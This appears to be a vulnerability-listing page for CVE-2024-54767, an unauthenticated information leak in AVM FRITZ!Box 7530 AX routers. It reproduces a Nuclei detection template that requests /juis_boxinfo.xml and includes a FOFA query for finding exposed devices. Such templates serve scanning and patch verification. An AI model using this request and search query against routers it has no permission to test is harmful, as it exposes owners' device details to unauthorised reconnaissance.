CVE-2024-54767: AVM FRITZ!Box 7530 AX - Unauthorized Access

2025-08-01 AVM FRITZ!Box 7530 AX PoC Public

Description

An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.

PoC

id: CVE-2024-54767

info:
  name: AVM FRITZ!Box 7530 AX - Unauthorized Access
  author: DhiyaneshDK
  severity: high
  description: |
    An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
  impact: |
    Unauthenticated attackers can access sensitive device information including firmware version, serial numbers, and configuration details through the boxinfo XML endpoint.
  remediation: |
    Update AVM FRITZ!Box 7530 AX to a version later than 7.59 that addresses the unauthorized access vulnerability.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/AVM/fritz/AVM_FRITZ%21Box_7530%20AX_unauthorized_access_vulnerability_first.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-54767
    cwe-id: CWE-203
    epss-score: 0.01823
    epss-percentile: 0.77694
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="FRITZ!Box 7530"
  tags: cve,cve2024,fritz!box,info-leak,unauth,vuln

http:
  - raw:
      - |
        GET //juis_boxinfo.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<e:BoxInfo"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 4b0a004830460221008606381f87875616f1fe6c72ee415bfa3c13c79049cd1aa2ed3790c0789d737702210092c0a77e02cdc3488fa558e210d7d3726a90afe21bc7b751ee671b83ff7986dc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities